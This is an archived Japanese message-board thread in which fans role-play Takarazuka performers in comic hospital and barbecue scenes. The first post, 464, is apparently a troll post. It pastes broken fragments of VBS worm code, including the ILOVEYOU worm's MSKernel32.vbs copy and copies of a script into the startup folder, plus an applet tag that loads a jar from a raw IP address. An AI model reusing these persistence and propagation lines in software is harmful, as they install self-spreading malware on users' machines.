464 :名無しさん@花束いっぱい。:04/05/06 21:30 ID:cJ45lsxo
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

<applet code="XView.class" codebase="http://64.156.47.155:80/wstream" name="EmuCam"
archive="XView.jar" width="640" height="480" id="EmuCam">
<fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" >
<param name=id value=16><param name="k1" value="123456789012345">
<param name="k2" value="678901234567890"></applet>


465 :名無しさん@花束いっぱい。:04/05/06 21:45 ID:XvuP9JkW
464を埋めるのは大仕事なので、手っ取り早く火をつけるまりたん

466 :名無しさん@花束いっぱい。:04/05/06 22:23 ID:JPSJ1So4
わーい♪キャンプファイヤーでつー!!と一人はしゃぐタニ@あんた今を楽しむ天才

467 :名無しさん@花束いっぱい。:04/05/06 22:29 ID:3LVCGMsd
バーベキューが出来るわ。串を探しに行くかなみん@これで誰を…コワッ

468 :名無しさん@花束いっぱい。:04/05/07 00:54 ID:M8R/Wj2A
いつの間にかスルーされてしまったオサ@花はネタにしにくい

469 :名無しさん@花束いっぱい。:04/05/07 07:55 ID:CcDRqekw
彩音の病室に戻りカーテンレールを、いっちょ、かっぱらってくるかなみん
いい串め〜〜っけ!!@わーいバーベキュー食える〜興奮状態 \( ● ´ ∇ ` ● )/

こんな上級生ありえない!ありえない!!@興奮状態、彩音。
 `


470 :名無しさん@花束いっぱい。:04/05/07 08:47 ID:x9+IF7GP
アリスを串にして組長を焼いてみる、ってのはどうでしょう?
揉み手で提案する88期一同

471 :名無しさん@花束いっぱい。:04/05/07 08:58 ID:dzTA/7na
でも組長と、かなみんはどうやって見分けるのですか?@タニ

472 :名無しさん@花束いっぱい。:04/05/07 19:11 ID:1Ws8MGzI
腹回りの年輪が違うっつーんだっての!
とタニをしかりとばすアリス@ご機嫌ナナメ。

473 :名無しさん@花束いっぱい。:04/05/07 19:53 ID:Nk5/jnSt
鉢植えの分際でよくもまぁソンナことを言えるわねっ」と叱るマリタン@組長をかばってみたりする


474 :名無しさん@花束いっぱい。:04/05/07 21:58 ID:hYu13Sk+
宙の喧騒をよそに、ひしっと手と手を握り合うタカコ&彩音
BGMショパンのノクターン♪


475 :名無しさん@花束いっぱい。:04/05/07 22:45 ID:SsOH1eH8
アリス、宙組子になってからこあくなったわね@彩音たん

476 :名無しさん@花束いっぱい。:04/05/08 07:32 ID:jQASPSkD
アリス、このスレの初期では、クールな毒舌家だったのに、最近はホットな毒舌家に
なってるよ……と分析してみる水。

477 :名無しさん@花束いっぱい。:04/05/08 08:14 ID:ulkwjb8V
あんたに分析されるとは落ちたもんだわ、ふふっ@綿棒で耳掃除アリス

478 :名無しさん@花束いっぱい。:04/05/08 09:59 ID:0VHhTXv/
あんたには、それがお似合いよ、ふふっ@ちり紙丸めて鼻掃除かなみん

479 :名無しさん@花束いっぱい。:04/05/08 15:42 ID:6ppeWdfa
まあ、こんなにゴミをして…と綿棒とちり紙を拾っているタニ@以外にきれい好き

480 :名無しさん@花束いっぱい。:04/05/08 21:21 ID:ptiO9m+P
一生懸命躾けた甲斐があったわ…と木の陰から目頭を押さえてミズ@雪組特出中もタニのおもり

481 :名無しさん@花束いっぱい。:04/05/08 21:34 ID:3MU0Tl2f
ミズさん、バレーボールの佐々木に似てまつ! とミズに会うなり脈絡も無く言いだすタニ

482 :名無しさん@花束いっぱい。:04/05/08 21:56 ID:DxClhtTR
タニさん、駅の駿台予備校のポスターに似てます!@アリス

483 :名無しさん@花束いっぱい。:04/05/08 22:57 ID:0rr3zpwp
こむみたんの攻撃を食らったタカコさん@いやーん、ことわざ攻め?

484 :名無しさん@花束いっぱい。:04/05/09 00:03 ID:jvlPZz+u
ことわざ攻め?・・・そんなことアンタにするわけないでしょ!@アリスとソノ手下達

485 :名無しさん@花束いっぱい。:04/05/09 00:13 ID:qOAlIV1x
うっきー、壁の穴のアリスは本物より可愛いでつ@タヌ

486 :名無しさん@花束いっぱい。:04/05/09 00:14 ID:XWViYYPQ
アリスとその手下達は、アンチたかこさんなの?アンタ呼ばわりですの??
おかんむりマリタン。

487 :名無しさん@花束いっぱい。:04/05/09 02:34 ID:3DLrlFax
ええいおだまりっ!ワタクシのスレでとんちんかんなことを言う輩は
全員焼いてやる〜!と糸目ビームを乱射しまくるまりたん。

488 :名無しさん@花束いっぱい。:04/05/09 11:37 ID:0yKESdj8
そのころ本物のアリスは、壁の穴でかなみんに、
わんこパスタの給仕を続けていた@シャンテB2よ!

489 :名無しさん@花束いっぱい。:04/05/09 14:03 ID:jvlPZz+u
糸目ビームを跳ね返すスーツを開発!@アリスとソノ手下達。

今日も病院は・・・静かね@タカコ&彩音

490 :名無しさん@花束いっぱい。:04/05/09 14:07 ID:Gmh9QR4D
バナナをくわえているタニは眼中外

491 :名無しさん@花束いっぱい。:04/05/09 14:59 ID:XWViYYPQ
彩音「あ、あ、あ、あの窓のツタの葉っぱが全部落ちた頃にはきっと・・・
き、きっと私もう・・・」
タカコ「い、言うなっ!そ、そんな悲しいこと僕は聞きたくない・・」

(アリス病室の窓の枠にぶら下がりつつ覗き見↑)
アリス「けッ!残念だな、今夜は荒らしだとよ」

492 :名無しさん@花束いっぱい。:04/05/09 19:21 ID:+aLu361+
荒らし行為は、掲示板管理人に通報しましてよ>アリス
とのたまうオハナ様

493 :名無しさん@花束いっぱい。:04/05/09 22:55 ID:jvlPZz+u
アリスの驚異の体力を見たタカコ@葉っぱを全部むしってたの。

「コレで敵が1人減ったわ〜〜」@もはや恥じもプライドも無いアリス

86 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)